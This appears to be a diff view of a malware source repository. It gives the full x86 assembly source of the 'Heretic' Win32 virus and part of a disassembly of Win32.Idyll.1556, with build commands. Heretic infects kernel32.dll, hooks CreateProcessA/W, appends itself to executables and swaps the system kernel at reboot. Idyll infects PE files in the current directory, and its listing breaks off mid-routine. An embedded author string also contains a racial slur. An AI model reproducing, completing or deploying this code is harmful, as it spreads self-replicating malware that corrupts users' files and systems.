GetWindowsDirectoryAVA dd ?
GetSystemDirectoryAVA dd ?
GetCurrentDirectoryAVA dd ?
SetCurrentDirectoryAVA dd ?
GetTickCountVA dd ?
LoadLibraryAVA dd ?
GetSystemTimeVA dd ?
GetProcAddressVA dd ?
K32VA: dd ?
K32EAT: dd ?
K32ENPT: dd ?
K32EO: dd ?
K32EOMax: dd ?
fileAlign dd ?
infCounter db ?
mapMem dd ?
mapView dd ?
IMHandle dd ?
IFHandle dd ?
origDir db 128h dup (?)
currDir db 128h dup (?)
FileTime STRUC
LDateTime dd ?
HDateTime dd ?
FileTime ENDS
FSearchData STRUC
FAttr dd ?
CrTime FileTime ?
LAcTime FileTime ?
LWrTime FileTime ?
FSizeH dd ?
FSizeL dd ?
Res0 dd ?
Res1 dd ?
FName db 260 dup (?)
AlFName db 16 dup (?)
FSearchData ENDS
FSearch FSearchData ?
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű DIALOG BOX PRO 1. GENERACI VIRU Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
VirusEnd:
push 0h ;First generation only!
push offset FGTitle
push offset FGMessage
push 0h
call MessageBoxA
push 0h
call ExitProcess
end Start
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű A TO JE VSE PRATELE Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
Win32/Infector/Win32.Harrier.asm
+3750
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Hatred.asm
+3153
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Heathen.asm
+2939
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.HempHoper.asm
+4949
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Heretic.asm
+882
View File
@@ -0,0 +1,882 @@
;
; SYNOPSIS
;
; Heretic - A Microsoft Windows 32 virus
;
; AUTHOR
;
; Memory Lapse, [NOP]
; formerly of Phalcon/Skism
;
; ABSTRACT
;
; This virus works under all beta versions of Windows 9x, and Windows NT 4.0.
; Under a Win32s environment, the virus will fail since the kernel doesn't
; physically export any useable API. Parsing the import table of the host image
; for GetProcAddress and GetModuleHandle should do the trick.
;
; NOTES
;
; Finally after seven months (including a four month hiatus for university),
; I've finally finished this virus.
;
; Ideally when the kernel is infected, the object the virus extends
; (typically .reloc) should have its flags with IMAGE_SCN_MEM_WRITE turned off.
; This will prevent in-memory patching by antivirus software. Heretic does
; not do this. At least not yet.
;
; Useful reading material: Microsoft Platform, SDK, and DDK Documentation
;
; Greets to priest, h8, lookout, virogen and johnny panic.
;
.386
locals
.model flat, stdcall
.code
.radix 16
include heretic.inc
CRC_POLY equ 0EDB88320
CRC_INIT equ 0FFFFFFFF
crc macro string
crcReg = CRC_INIT
irpc _x,
ctrlByte = '&_x&' xor (crcReg and 0ff)
crcReg = crcReg shr 8
rept 8
ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1))
endm
crcReg = crcReg xor ctrlByte
endm
dd crcReg
endm
MARKER equ "DOS lives somewhere in time"
org 0
start: push L offset host - start ;location of old entry point
ddOldEntryPoint = dword ptr $ - 4
pushfd ;save state
pushad
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta - start
;thanks vg!
db 81,0edh ;sub ebp,unsignedlong
ddEntryPoint dd 0
add [esp+24],ebp ;return address of host
mov edi,[esp+28] ;get a "random" pointer from stack
and edi,0FFFF0000 ;mask off bottom word
call try
catch: mov esp,[esp+8] ;get pointer to our stack-based
; exception record
jmp finally ;and return to host
try: push dword ptr fs:[0] ;this is our try { } block
mov fs:[0],esp ;create stack-based exception record
.repeat
dec edi ;move back a byte
lea eax,[edi-MAGIC] ;thanks h8!
cmp [edi],eax ;match? then we've found the kernel
.until zero?
mov esi,[eax+exe_str.pe_offset]
add esi,eax ;traverse PE header and find
; Export Data Directory Table
mov ebp,[esi+pe_str.export_tbl]
add ebp,eax ;RVA -> absolute
push eax
push [ebp+edt_str.edt_ord_base]
mov ebx,[ebp+edt_str.edt_ord_rva]
mov edi,[ebp+edt_str.edt_name_rva]
mov ebp,[ebp+edt_str.edt_addr_rva]
add ebx,eax ;adjust ordinal table pointer
add edi,eax ;adjust name pointer table pointer
add ebp,eax ;adjust address pointer table pointer
push ebp ;we save these values onto the stack
push eax ; so we can free up registers
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
push ebp
; on entry:
; [esp] : delta offset
; [esp+4] : image base
; [esp+8] : address pointer table
; [esp+0c] : ordinal base
; ebx - ordinal table
; esi - pointer to our list of apis
; edi - name pointer table
lea esi,[ebp+name_ptr_api]
mov ecx,1
mov edx,(name_ptr_api_end - name_ptr_api) / 4
top: push edx
push esi
mov esi,[edi] ;calculate absolute offset of
add esi,[esp+0c] ; name pointer (image base)
mov edx,CRC_INIT
lup: lodsb
or al,al ;termination token? then quit
jz chkCRC
xor dl,al
mov al,8
.repeat ;perform CRC-32 on string
shr edx,1 ;thanks jp!
.if carry?
xor edx,CRC_POLY
.endif
dec al
.until zero?
jmp lup
chkCRC: pop esi
push edi
mov ebp,ecx
shl ebp,1 ;convert count into word index
movzx eax,word ptr [ebx+ebp] ;calculate ordinal index
sub eax,[esp+14] ;relative to ordinal base
shl eax,2 ;convert ordinal into dword index
mov ebp,eax
mov edi,[esp+10]
add eax,edi ;calculate offset
mov edi,[edi+ebp] ;RVA of API (dereference said offset)
add edi,[esp+0c] ;convert to absolute offset
mov ebp,[esp+8]
cmp edx,CRC_POLY ;CreateProcessA?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessA],eax ;hook it
mov [ebp+CreateProcessA],edi
.endif
cmp edx,CRC_POLY ;or CreateProcessW?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessW],eax ;hook it
mov [ebp+CreateProcessW],edi
.endif
cmp edx,[esi] ;or an API the virus uses?
.if zero?
mov [esi+(name_ptr_api_end - name_ptr_api)],edi
lodsd ;update pointer
dec dword ptr [esp+4] ;decrement our API count
.endif
pop edi
next: pop edx
add edi,4 ;next API
inc ecx ;remember displacement
or edx,edx ;no more names to parse?
jnz top
pop ebp ;restore delta offset
add esp,0c ;clear stack
call [ebp+GlobalAlloc], \ ;allocate memory for global structure
GMEM_FIXED, \
L size vir_str
mov edi,eax
pop [edi+vir_str.lpKernelBase]
call kernel ;attempt to infect the kernel
call [ebp+GlobalFree], \ ;release global structure resources
edi
finally:pop dword ptr fs:[0] ;this is our finally { } block
pop eax ;trash exception handler address
;low and behold, the stack is restored
popad
popfd
ret
db '[nop] 4 life.. lapse, vg and jp own you! :)'
infect: mov [edi+vir_str.ddError],TRUE ;assume an error occurred
call [ebp+GetFileAttributesA], \
[edi+vir_str.lpFileName]
mov [edi+vir_str.ddFilterAttributes],eax
inc eax
jz exit
call [ebp+SetFileAttributesA], \ ;strip file attributes
[edi+vir_str.lpFileName], \
FILE_ATTRIBUTE_NORMAL
or eax,eax ;error? possibly a r/o disk?
jz exit
call [ebp+CreateFileA], \
[edi+vir_str.lpFileName], \
GENERIC_READ or GENERIC_WRITE, \
FILE_SHARE_NOTSHARED, \
NULL, \
OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL, \
NULL
mov [edi+vir_str.hFile],eax ;if we don't get a valid file
inc eax ;descriptor (ie. an invalid handle),
jz exitChmod ;quit processing
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+GetFileTime], \ ;save file timestamps
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CreateFileMappingA], \ ;create a mmap object
[edi+vir_str.hFile], \
NULL, \
PAGE_READONLY, \
L 0, \
L 0, \
NULL
or eax,eax
jz exitTime
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \ ;view the file in our address space
[edi+vir_str.hFileMappingObject], \
FILE_MAP_READ, \
L 0, \
L 0, \
L 0
or eax,eax
jz exitCloseMap
mov [edi+lpBaseAddress],eax
cmp word ptr [eax],IMAGE_DOS_SIGNATURE
jnz exitUnmap ;some sort of executable?
mov esi,eax
add esi,[eax+exe_str.pe_offset] ;seek to NT header
push eax
call [ebp+IsBadCodePtr], \ ;can we read the memory at least?
esi ;potentially not a Windows file?
or eax,eax
pop eax
jnz exitUnmap
cmp dword ptr [esi],IMAGE_NT_SIGNATURE
jnz exitUnmap ;PE file?
cmp [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
jz exitUnmap
lea eax,[ebp+infectKernel]
cmp [edi+vir_str.lpInfectMethod],eax;attempting to infect KERNEL32.DLL?
.if !zero?
test [esi+pe_str.flags],IMAGE_FILE_DLL
jnz exitUnmap ;and not a runtime library?
.endif
call getLastObjectTable
mov eax,[ebx+obj_str.obj_psize]
add eax,[ebx+obj_str.obj_poffset]
add eax,(_end - start) ;calculate maximum infected file size
mov ecx,[esi+pe_str.align_file]
call align
mov [edi+vir_str.ddFileSizeInfected],eax
call [ebp+UnmapViewOfFile], \
[edi+vir_str.lpBaseAddress]
call [ebp+CloseHandle], \
[edi+vir_str.hFileMappingObject]
call [ebp+CreateFileMappingA], \ ;reopen and extend mmap file
[edi+vir_str.hFile], \
NULL, \
PAGE_READWRITE, \
L 0, \
[edi+vir_str.ddFileSizeInfected], \
NULL
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \
[edi+vir_str.hFileMappingObject], \
FILE_MAP_WRITE, \
L 0, \
L 0, \
L 0
mov [edi+vir_str.lpBaseAddress],eax
add eax,[eax+exe_str.pe_offset]
mov esi,eax
call getLastObjectTable
mov eax,[ebx+obj_str.obj_rva] ;set new entry point if an EXE
add eax,[ebx+obj_str.obj_psize] ; or set hooks if kernel32.dll
call [edi+vir_str.lpInfectMethod]
push edi
push esi
mov edi,[edi+vir_str.lpBaseAddress]
add edi,[ebx+obj_str.obj_poffset]
add edi,[ebx+obj_str.obj_psize]
lea esi,[ebp+start]
mov ecx,(_end - start)
cld
rep movsb ;copy virus
pop esi
pop eax
xchg eax,edi
sub eax,[edi+vir_str.lpBaseAddress] ;new psize = old psize + (_end - start)
sub eax,[ebx+obj_str.obj_poffset]
mov ecx,[esi+pe_str.align_file]
call align ;calculate new physical size
mov [ebx+obj_str.obj_psize],eax
mov eax,[ebx+obj_str.obj_vsize]
add eax,(_end - start)
mov ecx,[esi+pe_str.align_obj]
call align ;calculate potential new virtual size
cmp eax,[ebx+obj_str.obj_psize] ;if new physical size > new virtual size
.if carry?
mov eax,[ebx+obj_str.obj_psize] ;then let the virtual size = physical size
.endif
mov [ebx+obj_str.obj_vsize],eax
add eax,[ebx+obj_str.obj_rva]
cmp eax,[esi+pe_str.size_image] ;infected host increased in image size?
.if !carry?
mov [esi+pe_str.size_image],eax
.endif
mov [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
or [ebx+obj_str.obj_flags],IMAGE_SCN_CNT_INITIALIZED_DATA or IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
lea eax,[ebp+szImageHlp]
call [ebp+LoadLibraryA], \ ;load image manipulation library
eax
or eax,eax
.if !zero?
push eax ;(*) argument for FreeLibrary()
lea ecx,[ebp+szChecksumMappedFile]
call [ebp+GetProcAddress], \ ;get address of image checksum api
eax, \
ecx
or eax,eax
.if !zero?
lea ecx,[esi+pe_str.pe_cksum]
lea edx,[edi+vir_str.ddBytes]
call eax, \ ;calculate checksum
[edi+vir_str.lpBaseAddress], \
[edi+vir_str.ddFileSizeInfected], \
edx, \
ecx
.endif
call [ebp+FreeLibrary] ;argument is set at (*)
.endif
mov [edi+vir_str.ddError],FALSE ;no errors!
exitUnmap:
call [ebp+UnmapViewOfFile], \ ;unmap the view
[edi+vir_str.lpBaseAddress]
exitCloseMap:
call [ebp+CloseHandle], \ ;remove mmap from our address space
[edi+vir_str.hFileMappingObject]
exitTime:
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+SetFileTime], \ ;restore file time
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CloseHandle], \ ;close the file
[edi+vir_str.hFile]
exitChmod:
call [ebp+SetFileAttributesA], \ ;restore file attributes
[edi+vir_str.lpFileName], \
[edi+vir_str.ddFilterAttributes]
exit: ret ;return to caller
kernel: call [ebp+GlobalAlloc], \ ;allocate memory for source buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpSrcFile],eax
call [ebp+GetSystemDirectoryA], \ ;store %sysdir% in source buffer
eax, \
_MAX_PATH
call [ebp+GlobalAlloc], \ ;allocate memory for destination buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpDstFile],eax
call [ebp+GetWindowsDirectoryA], \ ;store %windir% in destination buffer
eax, \
_MAX_PATH
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpSrcFile = %sysdir%\kernel32.dll
[edi+vir_str.lpSrcFile], \
eax
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpDstFile = %windir%\kernel32.dll
[edi+vir_str.lpDstFile], \
eax
call [ebp+CopyFileA], \
[edi+vir_str.lpSrcFile], \ ;%sysdir%\kernel32.dll
[edi+vir_str.lpDstFile], \ ; -> %windir%\kernel32.dll
FALSE
lea eax,[ebp+infectKernel]
mov [edi+lpInfectMethod],eax ;we're trying to infect the kernel
mov eax,[edi+vir_str.lpDstFile]
mov [edi+vir_str.lpFileName],eax
call infect
.if [edi+vir_str.ddError] == FALSE
lea eax,[ebp+szSetupApi]
call [ebp+LoadLibraryA], \
eax
or eax,eax ;if LoadLibrary fails, explicitly write
.if zero? ;to WININIT.INI (Windows 95)
lea eax,[ebp+szWinInitFile] ;delete the original kernel
push eax
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szKeyName]
push eax
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
lea eax,[ebp+szWinInitFile] ;move our patched kernel
push eax
push [edi+vir_str.lpDstFile]
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
.else
push eax ;(*) argument for FreeLibrary
lea ebx,[ebp+szSetupInstallFileExA] ;fetch address of API from this DLL
call [ebp+GetProcAddress], \
eax, \
ebx
or eax,eax
.if !zero?
lea ebx,[edi+ddBytes]
call eax, \ ;move patched kernel
NULL, \ ;NT->delay until next reboot
NULL, \ ; modified MoveFileEx behaviour?
[edi+vir_str.lpDstFile], \ ;98->WININIT.INI
NULL, \
[edi+vir_str.lpSrcFile], \
SP_COPY_SOURCE_ABSOLUTE or SP_COPY_DELETESOURCE, \
NULL, \
NULL, \
ebx
.endif
mov esi,eax
call [ebp+FreeLibrary]
mov eax,esi
.endif
or eax,eax
.if zero?
mov [edi+vir_str.ddError],TRUE
.endif
.endif
.if [edi+vir_str.ddError] == TRUE
call [ebp+DeleteFileA], \ ;delete %windir%\kernel32.dll if
[edi+vir_str.lpFileName] ; an error infecting or moving
.endif
call [ebp+GlobalFree], \ ;deallocate destination buffer
[edi+vir_str.lpDstFile]
call [ebp+GlobalFree], \ ;deallocate source buffer
[edi+vir_str.lpSrcFile]
ret
infectKernel:
xchg eax,ecx
movzx eax,[esi+pe_str.size_NThdr]
add eax,esi
add eax,offset pe_str.majik
mov edx,0
lpCreateProcessA = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
@@lup: cmp [eax+obj_str.obj_rva],edx ;was the API in the previous object?
ja @@next
add eax,size obj_str ;next object
jmp @@lup
@@next: sub eax,size obj_str ;seek back to export object
push L offset hookCreateProcessA - start
call trapAPI
mov edx,0
lpCreateProcessW = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
push L offset hookCreateProcessW - start
call trapAPI
ret
infectEXE:
mov [ebp+ddEntryPoint],eax
xchg eax,[esi+pe_str.rva_entry]
mov [ebp+ddOldEntryPoint],eax
ret
trapAPI:push ebx
push ecx
mov ebx,[eax+obj_str.obj_poffset]
sub ebx,[eax+obj_str.obj_rva]
add ebx,[edi+vir_str.lpBaseAddress]
add ebx,edx
add ecx,[esp+0c]
mov [ebx],ecx
pop ecx
pop ebx
ret 4
align: xor edx,edx
add eax,ecx
dec eax
div ecx
mul ecx
ret
getLastObjectTable:
movzx eax,[esi+pe_str.num_obj]
cdq
mov ecx,L size obj_str
dec eax
mul ecx
movzx edx,[esi+pe_str.size_NThdr]
add eax,edx
add eax,esi
add eax,offset pe_str.majik ;seek to last object table
xchg eax,ebx
ret
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectUnicode:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;find out how many bytes to allocate
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmapped characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
NULL, \ ; no buffer
L 0, \ ; tell us how many bytes to allocate
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
or eax,eax ;no bytes can be converted?
jz hookInfectError ;then bomb out.
push eax ;(*)
call [ebp+GlobalAlloc], \ ;allocate enough memory for the
GMEM_FIXED, \ ; converted UNICODE string
eax
or eax,eax ;any memory available?
pop ecx ;(*)
jz hookInfectError
mov esi,eax
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;UNICODE -> ANSI conversion
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmappable characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
esi, \ ; destination buffer for ANSI characters
ecx, \ ; size of destination buffer
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
jmp hookInfectDispatch
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectAnsi:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34] ;get the filename
call [ebp+lstrlenA], \ ;calculate string length
edi ; (not including null terminator)
or eax,eax ;zero length?
jz hookInfectError
inc eax ;include null terminator
call [ebp+GlobalAlloc], \ ;allocate some memory for the copy
GMEM_FIXED, \
eax
or eax,eax ;no memory?
jz hookInfectError
mov esi,eax
call [ebp+lstrcpyA], \ ;*edi -> *esi
esi, \
edi
hookInfectDispatch:
push esi ;(*) argument for GlobalFree
call [ebp+GlobalAlloc], \ ;instantiate our global structure
GMEM_FIXED, \
L size vir_str
or eax,eax ;fatal error if no memory
jz hookInfectErrorFree
mov edi,eax
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],FALSE ;assume no parsing fix-ups required
lodsb
cmp al,'"'
.if zero?
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],TRUE ;parsing fix-ups required
.endif
hookInfectParse:
lodsb ;get a byte
.if [edi+vir_str.ddError] == TRUE ;need a fix-up?
cmp al,'"' ;'"' is our terminator
jnz hookInfectParse
.else ;no fix-up required
cmp al,' ' ;' ' or \0 is our terminator
jz hookInfectParsed
or al,al
jnz hookInfectParse
.endif
hookInfectParsed:
mov byte ptr [esi-1],NULL ;null terminate string
lea eax,[ebp+infectEXE] ;we're infecting a non-kernel32 executable
mov [edi+vir_str.lpInfectMethod],eax
call infect
call [ebp+GlobalFree], \ ;deallocate global structure
edi
hookInfectErrorFree:
call [ebp+GlobalFree] ;deallocate lpFileName
hookInfectError:
ret
hookCreateProcessW:
push CRC_POLY
CreateProcessW = dword ptr $ - 4
hookUnicode:
pushfd
pushad
call hookInfectUnicode
popad
popfd
ret
hookCreateProcessA:
push CRC_POLY
CreateProcessA = dword ptr $ - 4
hookAnsi:
pushfd
pushad
call hookInfectAnsi
popad
popfd
ret
className db '[Heretic] by Memory Lapse',0
message db 'For my thug niggaz.. uptown baby, uptown.',0
szKernel db '\KERNEL32.DLL',0
szImageHlp db 'IMAGEHLP',0
szChecksumMappedFile db 'CheckSumMappedFile',0
szSetupApi db 'SETUPAPI',0
szSetupInstallFileExA db 'SetupInstallFileExA',0
szWinInitFile db 'WININIT.INI',0
szAppName db 'Rename',0
szKeyName db 'NUL',0
name_ptr_api:
ddCloseHandle: crc
ddCopyFileA: crc
ddCreateFileA: crc
ddCreateFileMappingA: crc
ddDeleteFileA: crc
ddFreeLibrary: crc
ddGetFileAttributesA: crc
ddGetFileTime: crc
ddGetProcAddress: crc
ddGetSystemDirectoryA: crc
ddGetWindowsDirectoryA: crc
ddGlobalAlloc: crc
ddGlobalFree: crc
ddIsBadCodePtr: crc
ddLoadLibraryA: crc
ddMapViewOfFile: crc
ddSetFileAttributesA: crc
ddSetFileTime: crc
ddUnmapViewOfFile: crc
ddWideCharToMultiByte: crc
ddWritePrivateProfileStringA: crc
ddlstrcatA: crc
ddlstrcpyA: crc
ddlstrlenA: crc
name_ptr_api_end:
; absolute offsets of desired API
CloseHandle dd 0
CopyFileA dd 0
CreateFileA dd 0
CreateFileMappingA dd 0
DeleteFileA dd 0
FreeLibrary dd 0
GetFileAttributesA dd 0
GetFileTime dd 0
GetProcAddress dd 0
GetSystemDirectoryA dd 0
GetWindowsDirectoryA dd 0
GlobalAlloc dd 0
GlobalFree dd 0
IsBadCodePtr dd 0
LoadLibraryA dd 0
MapViewOfFile dd 0
SetFileAttributesA dd 0
SetFileTime dd 0
UnmapViewOfFile dd 0
WideCharToMultiByte dd 0
WritePrivateProfileStringA dd 0
lstrcatA dd 0
lstrcpyA dd 0
lstrlenA dd 0
_end:
host: call MessageBoxA, \
NULL, \
L offset lpText, \
L offset lpCaption, \
L 0 ;MB_OK
call ExitProcess, \
L 0
.data
lpCaption db 'Memory Lapse has something to say..',0
lpText db 'Hello World!',0
end start
Win32/Infector/Win32.Hiv.asm
+2814
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Hortiga.asm
+1640
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Idele.asm
+1788
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Idyll.1556.asm
+689
View File
@@ -0,0 +1,689 @@
;
; Win32.Idyll.1556
; disassembly done by peon
;
;
;
; This is a noninteresting,nonresident infector of PE files.
; Infects files in the current directory.No payload or anything interesting.
; Assumed to be compiled with /m switch so NOP's after jumps included in the source.
;
; Sorry for the annoying lack of comments-most of the stuff is self-explanatory
; (so this is not the one you'll learn w32 coding from)
;
;
;compilation:
;tasm32 /m /ml idyll.asm
;tlink32 idyll,,,import32.lib /Tpe
;pewrsec idyll.exe
;
;
.386 ;the usual stuff
.model flat
extrn GetModuleHandleA:proc ;---\
; >virus needs these fns to be imported by host
extrn GetProcAddress:proc ;---/
extrn ExitProcess:proc
;
;struc def so no need of inc's
;
_find_data struc
_attr dd ?
_creatlo dd ?
_creathi dd ?
_lastalo dd ?
_lastahi dd ?
_lastwlo dd ?
_lastwhi dd ?
_sizehi dd ? ;@1C
_sizelo dd ? ;@20
_res0 dd ?
_res1 dd ?
_fname db 260 dup(?) ;@2C
_fuck db 10 dup (?) ;idyll allocates less than the real
_find_data ends ;size of finddata structure
.data
dd 0 ;tlink32 stuff
.code
host_start:
push 0
call ExitProcess
;
;we need some fixups like filling fn adds and encrypting api strings
;before starting the 1st generation sample
;
; This is where control is received from the loader... X-D
fixups:
mov eax,idyll_gmh ;getmodulehandle
mov eax,[eax] ;get dispatcher add
mov idyll_gmh,eax ;store it as virus does during
;infection
mov eax,idyll_gpa ;getprocaddress
mov eax,[eax]
mov idyll_gpa,eax ;do the same
mov esi,offset idyll_apinames ;ptr to apinames
mov ecx,idyll_length_of_apinames;# of bytes to crypt
fixup_xorloop:
xor byte ptr [esi],17h ;crypt byte
inc esi ;inc ptr
loop fixup_xorloop ;loop
jmp idyll ;launch virus
;the author (the false demon prophet) coded a host with 69h bytes of size
;i fix this with an org directive
org 69h
;
;----------------------- infective code begins here ----------------------------
;
idyll_start equ $
idyll_size equ idyll_end-idyll_start
;
;idyll main
;
idyll:
call idyll_flexible_entry_point ;will calculate delta offset
idyll_flexible_entry_point:
mov ebp,[esp] ;get offset from stack
sub ebp,offset idyll_flexible_entry_point ;fix ebp
add esp,4 ;perform pop off the stack
mov eax,[ebp+offset idyll_hostentry] ;entry point of host
lea edi,[ebp+idyll_hostentry_load] ;get add of instruction to patch
inc edi ;fix ptr (seems the author wasnt
; familiar with equ $-4 stuff)
mov [edi],eax ;patch code for return to host
mov edi,[ebp+offset idyll_gmh]
mov eax,[edi] ;get fn add
mov [ebp+idyll_getmodulehandlea_add],eax;store fn add
lea edi,[ebp+offset idyll_k32string] ;fetch ptr to 'KERNEL32' string
push edi ;pass param
call [ebp+idyll_getmodulehandlea_add] ;get a handle to KERNEL32.dll
mov [ebp+offset idyll_k32add],eax ;store it
mov edi,[ebp+offset idyll_gpa]
mov eax,[edi] ;get fn add
mov [ebp+idyll_getprocaddress_add],eax;store fn add
call idyll_xorloop_on_apinames ;decrypt api strings
call idyll_lookup_apis ;get fn addresses
call idyll_xorloop_on_apinames ;encrypt api strings
lea edi,[ebp+offset idyll_filemask] ;filemask for searches
call idyll_init ;init routines
cmp eax,-1 ;failed?
je idyll_hostentry_load ;yes abort
nop
nop ;nops for match
nop
nop
call idyll_infect ;try to infect
idyll_mainloop:
call idyll_findnext ;find next victim...
cmp eax,0 ;failed?
je idyll_hostentry_load ;if yes execute host
nop
nop
nop
nop
call idyll_infect ;otherwise infect
jmp idyll_mainloop ;and loop...
idyll_hostentry_load: ;@10F5
mov edi,0 ;this will be patched by virus
push edi ;store on TOS
ret ;jump to host
;
;allocate memory for finddata structure and call FindFirstFileA()
;
idyll_init: ;@1093(8293)
push edi ;store reg
push 4 ;acces protection:PAGE_READWRITE
push 1000h ;type of allocation:MEM_COMMIT
push size _find_data ;size of the region to allocate
push 0 ;address of region to reserve or commit
call [ebp+offset idyll_virtualalloc_add];call VirtualAlloc
mov [ebp+offset idyll_finddata_add],eax ;store add
pop edi
push eax
push edi
call [ebp+offset idyll_findfirstfilea_add] ;call FindFirstFileA()
mov [ebp+offset idyll_findhandle],eax ;store handle
ret
;
;launch FindNextFileA()
;
idyll_findnext:
mov eax,[ebp+offset idyll_finddata_add]
push eax ;store param
mov eax,[ebp+offset idyll_findhandle]
push eax ;store param
call [ebp+offset idyll_findnextfilea_add];call fn
ret ;back to caller
;
;infection routine
;
idyll_infect: ;@10D3
xor eax,eax
mov [ebp+offset idyll_sectsize],eax
call idyll_mapfile ;try to map file
cmp eax,0 ;failed?
je idyll_infect_return_failure
call idyll_testfile ;file can be infected?
test eax,eax ;eax zero if yes
jne idyll_infect_fail ;possibly already infected,abort
mov edi,[ebp+offset idyll_peheader] ;fetch PE header
add edi,78h ;start of RVA list
add edi,8 ;ptr to imports RVA
mov ebx,[edi] ;get value
call idyll_infect_findimports
mov esi,ebx
;
;scan imports for KERNEL32.dll module and GetModuleHandleA + GetProcAddress
;fns to patch virus before moving code into the victim
;
idyll_infect_importloop:
mov ebx,[esi+0ch]
call idyll_infect_findimports
mov edi,ebx
call idyll_infect_findk32
cmp eax,0
je idyll_infect_k32found
nop
nop
nop
nop
cmp byte ptr [edi],0 ;endmarker?
je idyll_infect_fail
add esi,14h ;next one..
jmp idyll_infect_importloop ;and branch
idyll_infect_k32found:
push esi
lea edi,[ebp+offset idyll_gmhstring] ;GetModuleHandleA string
mov ebx,[esi]
call idyll_infect_findimports ;find imports rva
mov ecx,16 ;size of gmh string
call idyll_infect_find_fn ;find fn
cmp eax,-1 ;failed?
pop esi
je idyll_infect_fail ;yes abort
mov edi,[esi+10h]
lea ebx,[eax*4]
add edi,ebx
xchg edi,ebx
mov edi,[ebp+offset idyll_peheader]
add ebx,[edi+34h] ;add imagebase
mov [ebp+offset idyll_gmh],ebx ;store add of GetModuleHandleA
push esi
lea edi,[ebp+offset idyll_gpastring] ;GetProcAddress string
mov ebx,[esi]
call idyll_infect_findimports
mov ecx,0eh ;size of string
call idyll_infect_find_fn
cmp eax,-1
pop esi
je idyll_infect_fail
mov edi,[esi+10h]
lea ebx,[eax*4]
add edi,ebx
xchg ebx,edi
mov edi,[ebp+offset idyll_peheader]
add ebx,[edi+34h] ;add imagebase
mov [ebp+offset idyll_gpa],ebx
mov edi,[ebp+offset idyll_peheader] ;needless
push edi
xor ecx,ecx
mov cx,[edi+6] ;get object count
dec cx ;counting starts from 1
mov esi,[ebp+offset idyll_1stsec] ;get ptr to 1st entry
idyll_infect_getlastentry:
add esi,40 ;size of each entry
loop idyll_infect_getlastentry ;get ptr to last entry
mov edx,[esi+0ch] ;get section RVA
add esi,16 ;esi points to PhysOffset
add edx,[esi] ;RVA+PhysOffset
push edx
mov ebx,[esi] ;PhysOffset of last section
mov edi,[ebp+offset idyll_peheader] ;needless again
mov eax,[edi+3ch] ;get file alignment unit
